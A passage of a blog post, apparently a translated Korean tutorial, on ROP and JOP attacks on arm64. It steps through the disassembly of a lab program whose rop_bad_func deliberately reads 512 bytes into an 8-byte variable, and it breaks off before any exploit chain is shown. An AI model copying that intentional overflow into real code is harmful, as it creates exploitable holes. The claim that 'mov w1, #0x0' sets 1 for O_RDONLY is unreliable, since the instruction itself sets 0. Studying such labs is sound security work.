{"id":2558,"date":"2024-05-31T08:15:41","date_gmt":"2024-05-30T23:15:41","guid":{"rendered":"https:\/\/h4ck.kr\/?p=2558"},"modified":"2024-06-04T10:05:02","modified_gmt":"2024-06-04T01:05:02","slug":"arm64-%ed%99%98%ea%b2%bd%ec%97%90%ec%84%9c-rop-jop-%ea%b3%b5%ea%b2%a9-%ec%9d%b4%ed%95%b4%ed%95%98%ea%b8%b0-%ec%9e%91%ec%84%b1-%ec%a4%91","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=2558","title":{"rendered":"Understanding ROP and JOP attacks in an arm64 environment"},"content":{"rendered":"\n<p>This time, to understand ROP and JOP attacks, we will use the project below and, <br>while debugging it directly, look at how a stack frame is formed, what each instruction means, and how each general-purpose register is used.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/geesun\/arm64_rop_jop\">https:\/\/github.com\/geesun\/arm64_rop_jop<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">ROP<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">1. Understanding stack frame formation and the execution of each instruction<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">main<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">peda-arm > disas main\nDump of assembler code for function main:\n   0x0000000000400464 &lt;+0>:\tstp\tx29, x30, [sp, #-16]!\n   0x0000000000400468 &lt;+4>:\tmov\tx29, sp\n   0x000000000040046c &lt;+8>:\tbl\t0x40041c &lt;rop_bad_func>\n   0x0000000000400470 &lt;+12>:\tmov\tw0, #0x0                   \t\/\/ #0\n   0x0000000000400474 &lt;+16>:\tldp\tx29, x30, [sp], #16\n   0x0000000000400478 &lt;+20>:\tret\nEnd of assembler dump.<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int main()\n{<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400464 &lt;+0>:\tstp\tx29, x30, [sp, #-16]!<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"596\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-1024x596.png\" alt=\"\" class=\"wp-image-2639\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-1024x596.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-300x174.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-768x447.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-1536x893.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc1-2048x1191.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p><strong>x29 register<\/strong><br>The frame pointer register, used to track the stack frame.<br>When a function is called and a new stack frame is created, the x29 register is saved on the stack.<\/p>\n\n\n\n<p><strong>x30 register<\/strong><br>The link register (lr): when a BL\/BLR instruction branches to another address, <br>the pc register value is saved in this register.<br>Think of it as holding the address for returning to the previous function.<\/p>\n\n\n\n<p>So, as preparation for creating the current function's frame, <br>the x29 register value (the previous function's frame pointer) and <br>the x30 register value (the return address for going back to the previous function) are saved on the stack;<br>to store them, the stack is first grown by 16 bytes.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400468 &lt;+4>:\tmov\tx29, sp<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-1024x587.png\" alt=\"\" class=\"wp-image-2570\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-1024x587.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-300x172.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-768x440.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-1536x880.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc2-2-2048x1173.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p>Copies the value of the sp register (the current stack pointer) into the x29 register (the frame pointer).<\/p>\n\n\n\n<p>This instruction exists to set up the new frame pointer for the current function.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">rop_bad_func();<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040046c &lt;+8>:\tbl\t0x40041c &lt;rop_bad_func><\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"736\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-1024x736.png\" alt=\"\" class=\"wp-image-2571\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-1024x736.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-300x216.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-768x552.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-1536x1104.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc3-1-2048x1472.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p><strong>BL (Branch with Link)<\/strong> &lt;rop_bad_func&gt;<\/p>\n\n\n\n<p>Internally it is carried out as follows.<br>(1) mov lr, = next instruction (pc)<br>(2) mov pc, =dest<\/p>\n\n\n\n<p>When the BL instruction calls rop_bad_func, the return address for going back to main is stored in the lr register,<br>and execution branches to rop_bad_func, so pc changes to that function's address.<\/p>\n\n\n\n<p>Here the pc register is the program counter, used to point at the next instruction.<br>Its role is similar to that of the RIP register on the x86_64 architecture.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void rop_bad_func()\n{<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040041c &lt;+0>:\tstp\tx29, x30, [sp, #-48]!\n0x0000000000400420 &lt;+4>:\tmov\tx29, sp<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"826\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-1024x826.png\" alt=\"\" class=\"wp-image-2580\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-1024x826.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-300x242.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-768x620.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-1536x1239.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc4-3-2048x1652.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Explanation<\/strong><\/h3>\n\n\n\n<p>Once again, as preparation for creating a frame, 48 is subtracted from the stack pointer sp to extend the stack by that much.<br>main's frame pointer address and the address for returning to main are saved on the stack.<\/p>\n\n\n\n<p>Also, the mov x29, sp instruction<br>copies the sp register value into the x29 register, <br>to set up the new frame pointer for the current function, rop_bad_func.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>rop_bad_func<\/strong><\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">peda-arm > disas rop_bad_func\nDump of assembler code for function rop_bad_func:\n   0x000000000040041c &lt;+0>:\tstp\tx29, x30, [sp, #-48]!\n   0x0000000000400420 &lt;+4>:\tmov\tx29, sp\n   0x0000000000400424 &lt;+8>:\tstp\txzr, xzr, [x29, #24]\n   0x0000000000400428 &lt;+12>:\tstr\txzr, [x29, #16]\n   0x000000000040042c &lt;+16>:\tstr\twzr, [x29, #44]\n   0x0000000000400430 &lt;+20>:\tadrp\tx0, 0x450000 &lt;_nl_locale_subfreeres+440>\n   0x0000000000400434 &lt;+24>:\tadd\tx0, x0, #0x5c0\n   0x0000000000400438 &lt;+28>:\tmov\tw1, #0x0\n   0x000000000040043c &lt;+32>:\tbl\t0x418de0 &lt;open64>\n   0x0000000000400440 &lt;+36>:\tstr\tw0, [x29, #44]\n   0x0000000000400444 &lt;+40>:\tadd\tx0, x29, #0x10\n   0x0000000000400448 &lt;+44>:\tmov\tx2, #0x200\n   0x000000000040044c &lt;+48>:\tmov\tx1, x0\n   0x0000000000400450 &lt;+52>:\tldr\tw0, [x29, #44]\n   0x0000000000400454 &lt;+56>:\tbl\t0x418fd8 &lt;read>\n   0x0000000000400458 &lt;+60>:\tnop\n   0x000000000040045c &lt;+64>:\tldp\tx29, x30, [sp], #48\n   0x0000000000400460 &lt;+68>:\tret<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">char data[16] = {0};<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400424 &lt;+8>:\tstp\txzr, xzr, [x29, #24]<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"818\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-1024x818.png\" alt=\"\" class=\"wp-image-2583\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-1024x818.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-300x240.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-768x614.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-1536x1227.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc5-2048x1637.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p>The STP instruction is Store Pair of Registers:<br>it stores a pair of registers, that is, two registers at consecutive memory locations.<\/p>\n\n\n\n<p>So it sets the values at the addresses 24 and 32 bytes from the x29 frame pointer to 0.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">unsigned long long u64 = 0;<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400428 &lt;+12>:\tstr\txzr, [x29, #16]<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"818\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-1024x818.png\" alt=\"\" class=\"wp-image-2589\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-1024x818.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-300x240.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-768x614.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-1536x1227.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc6-2048x1637.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p>The STR instruction is Store: it stores a register's value to memory.<\/p>\n\n\n\n<p>It stores 0 at the location 16 bytes from the x29 frame pointer.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int fd = 0;<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040042c &lt;+16>:\tstr\twzr, [x29, #44]<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"736\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-1024x736.png\" alt=\"\" class=\"wp-image-2592\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-1024x736.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-300x216.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-768x552.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-1536x1105.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc7-2048x1473.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Explanation<\/strong><\/h3>\n\n\n\n<p>WZR is the 4-byte zero register.<\/p>\n\n\n\n<p>It stores a 4-byte 0 at the location 44 bytes from the x29 frame pointer.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"75\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1-1024x75.png\" alt=\"\" class=\"wp-image-2595\" style=\"width:auto;height:30px\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1-1024x75.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1-300x22.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1-768x56.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_1.png 1443w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400430 &lt;+20>:\tadrp\tx0, 0x450000 &lt;_nl_locale_subfreeres+440>\n0x0000000000400434 &lt;+24>:\tadd\tx0, x0, #0x5c0<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p>The ADRP instruction stores the page address 0x450000 in the x0 register, so x0 becomes 0x450000.<br>The ADD instruction then adds 0x5c0, so x0 becomes 0x4505c0.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"75\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2-1024x75.png\" alt=\"\" class=\"wp-image-2596\" style=\"width:auto;height:30px\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2-1024x75.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2-300x22.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2-768x56.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2.png 1443w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400438 &lt;+28>:\tmov\tw1, #0x0<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p>1, meaning O_RDONLY, is set as the value of the w1 register.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"74\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3-1024x74.png\" alt=\"\" class=\"wp-image-2597\" style=\"width:auto;height:30px\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3-1024x74.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3-300x22.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3-768x56.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3.png 1448w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040043c &lt;+32>:\tbl\t0x418de0 &lt;open64><\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p>The BL instruction branches in order to call the open function.<\/p>\n\n\n\n<p>The point to know here is that the first eight parameters are passed through registers <code>x0<\/code> to <code>x7<\/code>, <br>and any additional parameters are passed on the stack.<\/p>\n\n\n\n<p>Indeed, <br>x0, the first parameter of open, holds the address of the string &#8220;.\/rop.data&#8221;,<br>and x1, the second parameter of open, holds 1, meaning O_RDONLY.<\/p>\n\n\n\n<p>Once open has been called and returns, its return value is stored in the x0 register. <br>(This is similar to how a function's return value is stored in the rax register on x86_64.)<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Code<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"78\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4-1024x78.png\" alt=\"\" class=\"wp-image-2600\" style=\"width:auto;height:30px\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4-1024x78.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4-300x23.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4-768x59.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4.png 1443w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400440 &lt;+36>:\tstr\tw0, [x29, #44]<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"865\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-1024x865.png\" alt=\"\" class=\"wp-image-2601\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-1024x865.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-300x253.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-768x649.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-1536x1298.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-2048x1730.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Explanation<\/h3>\n\n\n\n<p>At the location 44 bytes from the x29 frame pointer (= fd), <br>it stores the 4-byte w0 register value, 3 (= the return value of open).<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">read(fd,&amp;u64,512);<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Assembly<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400444 &lt;+40>:\tadd\tx0, x29, #0x10\n0x0000000000400448 &lt;+44>:\tmov\tx2, #0x200\n0x000000000040044c &lt;+48>:\tmov\tx1, 